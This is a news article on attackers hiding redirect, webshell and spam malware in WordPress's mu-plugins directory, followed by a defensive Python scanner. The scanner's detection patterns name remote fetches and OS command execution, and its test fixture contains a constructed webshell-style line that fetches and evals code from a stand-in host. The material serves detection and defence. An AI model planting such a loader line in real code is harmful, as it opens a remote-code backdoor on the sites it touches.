WordPress attackers hide malware in overlooked plugins directory

March 31, 2025



WordPress attack campaigns are leveraging an often overlooked plugin directory to hide and automatically load malware on compromised sites, according to Sucuri.

The Must-Use plugins (mu-plugins) directory is used to store essential plugins that are necessary for a site to run properly. The directory is separate from the standard interface where plugins are managed. This feature allows the files in mu-plugins to be automatically loaded on sites, and their storage in a separate directory is designed to prevent users from accidentally disabling them, which could break the site.

However, Sucuri discovered several cases of attackers injecting malware into the mu-plugins directory in order to prevent detection and ensure their own files are automatically loaded.

The malware campaigns detected included one that redirected site visitors to a malicious website, one that executed a webshell on the compromised site and one that used a script to replace images and links on the site with spam.

The redirect malware was found in the file “redirect.php” in the mu-plugins directory and checked whether a visitor was a bot or administrator before sending them to a malicious website that prompted them to install a fake browser or system update.

The webshell, which acts as a backdoor to enable remote code execution on the compromised WordPress server, was stored in the mu-plugins directory in the file “index.php.” The file downloads and executes an external PHP script controlled by the attacker.

The spam malware uses the file “custom-js-loader.php” and is a JavaScript injector that replaces all images on the WordPress site with pornographic content and hijacks all outbound links to a malicious popup.

Sucuri noted that these multiple campaigns suggest an ongoing trend of attackers leveraging mu-plugins, with the company previously observing backdoor malware leveraging the directory in February.
The mu-plugins directory is often overlooked during normal security checks, according to Sucuri, and WordPress admins are recommended to ensure this directory is included in scans for malicious files.

Admins are recommended to ensure their WordPress sites are secured by keeping WordPress, plugins and themes updated, using strong passwords and enabling two-factor authentication, as attackers first need to gain access to make changes to the mu-plugins directory.

If a compromise is suspected, admins should ensure any unrecognized files in the mu-plugins directory are removed along with any other malicious files and unauthorized admin accounts.
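As an added example (not Sucuri's code or tooling), here is a small Python scanner that does what the advice above asks: inventory the mu-plugins directory, list every file in it, and flag files whose name or contents match the indicators the article describes (the three reported file names, remote fetch plus execution, obfuscation, visitor redirects). The sample files are constructed inline; the indicator patterns are my own assumptions, and a match is a review flag, not proof of compromise.

```python
# Added example, not Sucuri's code: inventory a mu-plugins directory and flag
# files whose name or contents match the indicators described above.
import re
import tempfile
from pathlib import Path

# File names from the report; a red flag when you did not create them yourself.
REPORTED_NAMES = {"redirect.php", "index.php", "custom-js-loader.php"}
# Content indicators (assumed patterns): remote fetch plus execution (the
# webshell loader), obfuscation, OS commands and visitor redirects.
INDICATORS = [
    (r"\beval\s*\(", "eval()"),
    (r"\bbase64_decode\s*\(", "base64_decode()"),
    (r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", "fetches remote URL"),
    (r"\b(system|shell_exec|passthru|exec|popen)\s*\(", "runs OS commands"),
    (r"header\s*\(\s*['\"]Location:", "issues HTTP redirect"),
]

def scan_mu_plugins(mu_dir):
    """Return {relative_path: [reasons]} for every file under mu_dir. Files with no
    reasons are still listed: mu-plugins is normally empty or tiny, so anything
    you did not put there is worth a look regardless of its contents."""
    root = Path(mu_dir)
    report = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = []
        if path.name in REPORTED_NAMES:
            reasons.append("name matches a file from the Sucuri report")
        if path.suffix.lower() in {".php", ".phtml", ".php5", ".php7"}:
            text = path.read_text(errors="replace")
            reasons += [label for pat, label in INDICATORS
                        if re.search(pat, text, re.IGNORECASE)]
        report[str(path.relative_to(root))] = reasons
    return report

def build_fixture(mu_dir):
    """Write constructed sample files (not real malware) to exercise the scanner."""
    root = Path(mu_dir)
    (root / "site-tweaks.php").write_text("<?php\nadd_filter('login_errors', fn() => 'Login failed');\n")
    (root / "redirect.php").write_text("<?php\nif (!is_admin()) { header('Location: http://example.invalid/'); }\n")
    (root / "index.php").write_text("<?php\neval(file_get_contents('http://example.invalid/p.txt'));\n")

def demo():
    # Build the constructed fixture in a temp dir, scan it and return the report.
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_mu_plugins(tmp)
if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {', '.join(reasons) or 'no indicators; verify by hand'}")
```

Point `scan_mu_plugins()` at a real site's `wp-content/mu-plugins` to get the same listing; anything not placed there by you or your hosting stack should be reviewed even when no reason is attached.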


